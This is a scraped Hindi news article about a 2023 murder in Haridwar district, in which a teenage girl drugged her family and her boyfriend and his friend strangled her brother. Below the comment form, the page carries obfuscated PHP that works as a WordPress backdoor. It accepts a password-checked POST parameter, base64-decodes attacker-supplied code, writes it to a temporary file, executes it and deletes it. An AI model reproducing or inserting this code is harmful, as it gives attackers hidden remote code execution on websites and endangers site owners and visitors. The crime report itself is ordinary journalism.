Murder: प्‍यार में बाधा बन रहे भाई को बहन ने उतारा मौत के घाट, जाने पुरा मामला

Uttarakhand Press News, 14 March 2023: Murder in Haridwar: प्रेम संबंधों में बाधक बनने पर 17 वर्षीय किशोर की गला घोंटकर हत्या की गई थी। मृतक की नाबालिग बहन ने अपने प्रेमी और उसके दोस्त के संग मिलकर अपने भाई की हत्या को अंजाम दिया था। घटना को अंजाम देने से पहले किशोरी ने सभी स्वजन को खाने में नींद की दवा दी थी। पुलिस ने तीनों आरोपितों को गिरफ्तार कर लिया है। किशोरी के प्रेमी व उसके दोस्त को जेल भेज दिया गया है, जबकि किशोरी का मेडिकल परीक्षण कराया जा रहा है। जिसके बाद मुकदमे में प्रेमी के विरुद्ध पोक्सो एक्ट की धाराएं बढ़ाई जाएंगी।

संदिग्ध परिस्थितियों में लापता हो गया था भाई:
एसपी क्राइम रेखा यादव सोमवार को बताया कि लक्सर कोतवाली के ढाढेकी गांव निवासी 17 वर्षीय किशोर छह फरवरी को संदिग्ध परिस्थितियों में लापता हो गया था। सुबह किशोर के नहीं मिलने पर स्वजन ने पुलिस को उसकी गुमशुदगी की सूचना दी थी।

मामले में अज्ञात के खिलाफ मुकदमा दर्ज कर पुलिस युवक की तलाश में जुटी थी। जांच के दौरान पुलिस को किशोर की नाबालिग बहन की गतिविधियों पर संदेह हुआ। जिस पर पुलिस ने उससे गहनता से पूछताछ की। उससे मिली जानकारी पर पुलिस ने ढाढेकी गांव निवासी आरोपित राहुल और उसके दोस्त कृष्णा को हिरासत में लेकर उनसे पूछताछ की तो हैरान करने वाली जानकारी सामने आई।इसके बाद पुलिस ने बीते रविवार को राहुल की निशानदेही पर उसके घर में कई फीट गहरे गड्ढे में दबाकर रखे गए किशोर के शव को बरामद कर लिया गया। एसपी क्राइम रेखा यादव ने बताया कि मृतक किशोर की नाबालिग बहन के पड़ोसी युवक राहुल के साथ प्रेम प्रसंग चला रहा था।

बहन को आपत्तिजनक स्थिति में देख लिया था:
किशोर ने अपनी बहन को आपत्तिजनक स्थिति में देख लिया था तथा उसने इसका विरोध करते हुए अपनी बहन की पिटाई भी की थी। इसकी जानकारी किशोरी ने अपने प्रेमी राहुल को दी। जिस पर उन्होंने किशोर को रास्ते से हटाने की योजना बना ली। पुलिस के मुताबिक पांच-छह फरवरी की रात को किशोरी ने घर के खाने में नींद की गोलियां मिला दी। जिससे स्वजन बेसुध हो गए।इसके बाद राहुल और उसका दोस्त कृष्णा वहां पहुंचे और किशोर का गला घोंटकर उसकी हत्या कर दी। शव को उन्होंने पड़ोस में ही राहुल के घर के परिसर में गड्ढा खोदकर दबा दिया। इसके बाद किशोरी ने स्वयं भी नींद की गोली खा ली और सो गई।

गिरफ्तारी के बाद पुलिस ने दोनों आरोपितों को गिरफ्तार कर जेल भेज दिया। जबकि किशोरी का मेडिकल परीक्षण कराया जा रहा है। मेडिकल परीक्षण के बाद राहुल के खिलाफ पोक्सो एक्ट भी लग सकता है।

Read Previous

हल्द्वानी: दमुवाढूंगा निवासी इंजीनियर की संदिग्ध हालात में मौत, नहर में मिला शव

Read Next

हल्द्वानी: कक्षा 12 की परीक्षा देकर लौट रही छात्र और उसके भाई को पीटकर किया लहूलुहान

Leave a Reply

Your email address will not be published. Required fields are marked *

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}